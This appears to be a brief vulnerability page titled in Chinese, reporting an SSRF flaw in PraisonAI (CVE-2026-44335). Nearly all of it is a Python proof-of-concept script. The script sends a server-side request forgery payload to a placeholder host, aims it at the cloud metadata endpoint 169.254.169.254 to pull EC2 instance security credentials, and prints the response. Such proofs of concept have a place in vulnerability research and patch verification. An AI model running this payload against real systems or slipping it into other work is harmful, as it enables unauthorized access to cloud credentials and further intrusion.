CVE-2026-44335 PraisonAI存在SSRF漏洞

import requests # Target URL where the vulnerability exists # Replace 'TARGET_HOST' with the actual vulnerable instance target_url = "http://TARGET_HOST/api/v1/endpoint" # Malicious payload demonstrating SSRF # Attempting to access internal metadata service (common in cloud environments) # Attackers might also try 127.0.0.1, 0.0.0.0, or internal subnet IPs ssrf_payload = "http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance" # Parameter name usually vulnerable in SSRF (e.g., url, target, feed) params = { "url": ssrf_payload } try: print(f"[*] Sending SSRF request to {target_url}...") response = requests.get(target_url, params=params, timeout=10) if response.status_code == 200: print("[+] SSRF Exploitation Successful!") print("[+] Response Content:") print(response.text[:500]) # Print first 500 chars else: print(f"[-] Request returned status code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}")